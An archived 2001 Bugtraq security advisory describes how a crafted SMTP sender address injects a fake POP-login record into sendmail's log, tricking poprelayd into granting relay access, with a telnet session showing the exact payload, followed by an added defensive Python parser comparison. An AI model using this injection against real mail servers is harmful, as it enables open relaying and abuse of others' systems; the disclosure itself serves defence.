Bugtraq mailing list archives
poprelayd and sendmail relay authentication problem (Cobalt Raq3)
From: Andrea Barisani <lcars () infis univ trieste it>
Date: Tue, 3 Jul 2001 19:05:10 +0200 (CEST)
Hi to all,

Poprelayd is a simple script that scans /var/log/maillog for valid pop logins and updates a hash db used by sendmail to permit relaying for those valid pop users; this method is called "Pop-before-smtp".

The syslog string searched by the script is in this form for the qpop server:

/POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9]\.]+)/)

On some Cobalt Raq3 servers (with the poprelayd add-on packet installed) and in general on any system running the poprelayd script with sendmail, it is possible to "inject" this string in the syslog using sendmail logging. So anyone can insert a fake string with his own IP which will be parsed by poprelayd and that will permit the use of sendmail as a relay.

On cobalts the presence of poprelayd is revealed by the modified sendmail relaying denied message "Relaying denied. Please check your mail first."

Example:

telnet dumbcobalt 25
Trying 123.123.123.123...
Connected to dumbcobalt
...
ehlo dumbcobalt
...
mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org"
553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org"...Domain name required

now the IP 66.66.66.66 can do relay :)

in fact, on dumbcobalt:

in /var/log/maillog

...reject=533 "POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org", size=0, class=0 ....etc etc...

[root@dumbcobalt /]# /usr/sbin/poprelayd -p 66.66.66.66 7

;-)

Bye

------------------------------------------------------------
INFIS Network Administrator & Security Officer
Department of Physics - University of Trieste
lcars () infis univ trieste it - PGP Key 0x8E21FE82
------------------------------------------------------------
"How would you know I'm mad?" said Alice.
"You must be,'said the Cat,'or you wouldn't have come here."
------------------------------------------------------------
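Added example, not part of the original post and not poprelayd's own code: a Python sketch of why an unanchored search over the whole log line trusts text that sendmail logged on the sender's behalf, next to a parser that checks which program wrote the line before reading its message. The log lines are constructed, the NAIVE pattern only approximates the one quoted above, and the "qpopper" syslog tag is an assumption.

```python
import re

# Approximation of the unanchored pattern quoted in the post (assumption: the
# last group is meant to capture a dotted-quad address).
NAIVE = re.compile(r'POP login by user "[-_\w]+" at \(.+\) ([0-9.]+)')

# Hardened variant: split the syslog header off first, accept only lines
# written by the POP daemon, and anchor the message at both ends so nothing
# may precede or follow the login record.
SYSLOG = re.compile(
    r'^\w{3} [ \d]\d \d\d:\d\d:\d\d (\S+) ([\w./-]+)(?:\[\d+\])?: (.*)$')
STRICT_MSG = re.compile(
    r'^POP login by user "[-_\w]+" at \([^()]+\) (\d{1,3}(?:\.\d{1,3}){3})$')
POP_TAGS = {"qpopper"}  # assumption: the tag the POP daemon logs under

def naive_ip(line):
    """Return the IP the unanchored search would authorize, or None."""
    m = NAIVE.search(line)
    return m.group(1) if m else None

def strict_ip(line):
    """Return the IP only if the POP daemon itself wrote the login record."""
    hdr = SYSLOG.match(line)
    if not hdr or hdr.group(2) not in POP_TAGS:
        return None
    m = STRICT_MSG.match(hdr.group(3))
    return m.group(1) if m else None

# Constructed sample lines: one real POP login, one sendmail reject line
# that echoes the sender-supplied string described in the post.
SAMPLE_LOG = [
    'Jul  3 19:00:01 dumbcobalt qpopper[1234]: POP login by user "alice" '
    'at (client.example.org) 192.0.2.10',
    'Jul  3 19:01:12 dumbcobalt sendmail[2345]: reject=533 "POP login by user '
    '"admin" at (66.66.66.66) 66.66.66.66 @linux.org", size=0, class=0',
]

def relay_sets(lines):
    """Addresses each parser would add to the relay database."""
    naive = {ip for ip in map(naive_ip, lines) if ip}
    strict = {ip for ip in map(strict_ip, lines) if ip}
    return naive, strict

if __name__ == "__main__":
    naive, strict = relay_sets(SAMPLE_LOG)
    print("unanchored search authorizes:", sorted(naive))
    print("tag-checked parser authorizes:", sorted(strict))
```

Any address present in the first set but not the second came from a line the POP daemon did not write, which also makes the difference usable as a check against an existing maillog.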